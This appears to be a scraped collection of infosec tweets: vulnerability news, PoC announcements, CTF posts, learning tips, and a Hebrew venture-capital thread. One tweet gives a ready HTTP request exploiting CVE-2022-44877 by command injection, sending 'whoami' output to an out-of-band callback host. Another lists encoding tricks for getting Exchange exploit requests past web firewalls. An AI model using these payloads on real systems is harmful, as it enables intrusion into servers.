🔊 "Wild IoT Tales" Talk is OUT! Learn about Latest Hackers' TTP's, Reverse-Engineer Industroyer2, Learn about New Conti Ransomware Strains and astonishing recent attack stories over critical infrastructures! 🔊 REC: https://t.co/t6LVWxlsCu 🔊 SLIDES:

This was the random link I found on LinkedIn, which contains the BugBounty guide! Source: https://t.co/CgbjdQ4GSr I don't know about the quality of the material, just sharing coz maybe it helps #infosec #bugbountytips #Resource #Hacking #infosecurity #CyberSecurity

For those of you who are finding #SharePoint Pre-Auth #RCE ( #CVE-2023-29357 + CVE-2023–24955 ) too technical to understand, here's a simplified version. 🧵(0/n)

https://t.co/rK6VBUeBjM

Excited to publish our PoC & analysis for Winrar's CVE-2023-40477 https://t.co/gVKehxiTM9 Interested in More Research? contact us @ wild pointer - contact@wildptr.io #winrarvulnerability #securityresearch #winrar #cve_2023_40477 #cve202340477 #winrarvuln #recvol3

Critical RCE flaw (CVE-2023-29017) discovered in popular #JavaScript sandbox module vm2. All versions, including 3.9.14 and prior, affected. Learn more: https://t.co/WTT6JtMFx8 #cybersecurity #informationsecurity

Played with Outlook CVE-2023-23397. Made a simple PoC email builder & sender featuring malicious reminder (just a Msg, no need to use a Task or Cal. Ev.). Critical 0-click account takeover on internal networks even after MS patch, no need to open the message on the victim side.

you see, `syscall` actually calls `do_syscall`. which in turn calls `_do_syscall`. got it? and that turns around and calls `____syscall`. which is basically a wrapper for `__syscall`, that's where the magic happens. it does `arg->ops->syscall` which was set in a diff code path.

#CVE-2022-44877 Control Web Panel Unauth #RCE POC: POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1 Host: vuln Content-Type: application/x-www-form-urlencoded username=root&password=toor&commit=Login

lol

1/ חלאס עם cyber product feature parity 🥱 הגיע הזמן ל cyber VC startup parity 💡 יצאתי לבדוק 5 קרנות סייבר ישראליות עם 71(!) סטארטאפים 💪 ❓איזו קטגוריה ייחודית לכל קרן? אילו קרנות עם פורטפוליו דומה? 💰 ממי יוצאים הכי הרבה אקזיטים? 🦄יוניקורנים? כל הפרטים בסוף 👇 עושים סדר🧵

Me and Billy ( @st424204 ) created a series of pwn challenges called Fourchain for this year's HITCON CTF. Here are the posts about the Browser & Hypervisor part of the challenge: Browser : https://t.co/8S1jAc5ADo Hypervisor: https://t.co/u5JI8Riilv Enjoy ! #HITCONCTF2022

Prerequisite knowledge before starting to learn about web vulns: * Can you explain from start to finish what happens when a URL gets placed into the URL bar? * Do you know how DNS works? * Do you know about TCP connections? * Do you know how to read HTTP requests and responses?

This weekend I built =GPT3(), a way to run GPT-3 prompts in Google Sheets. It's incredible how tasks that are hard or impossible to do w/ regular formulas become trivial. For example: sanitize data, write thank you cards, summarize product reviews, categorize feedback...

Another appliance vuln down... CVE-2022-40684, affecting multiple #Fortinet solutions, is an auth bypass that allows remote attackers to interact with all management API endpoints. Blog post and POC coming later this week. Patch now.

I've seen also samples remind of these https://t.co/KNQlA96NT9

*Instead of writing full emails like with .com and such: %XX@%YY.%ZZ..%WW etc

Lower Casing powershell as well: */powershell/ instead of Powershell

Probably WAF Bypasses Observed IN-THE-WILD for Exchange Zero-Days (CVE-2022-41040, etc..) #ProxyNotShell #exchangerce *Instead of writing Email / autodiscover: Em%61il=%61utodiscover/%61utodiscover.json? *Instead of writing ".json": %61utodiscover.jso%6E?

The latest Google Pixel 6 pwned with a 0day in kernel! Achieved arbitrary read/write to escalate privilege and disable SELinux without hijacking control flow. The bug also affects Pixel 6 Pro, other Pixels are not affected :)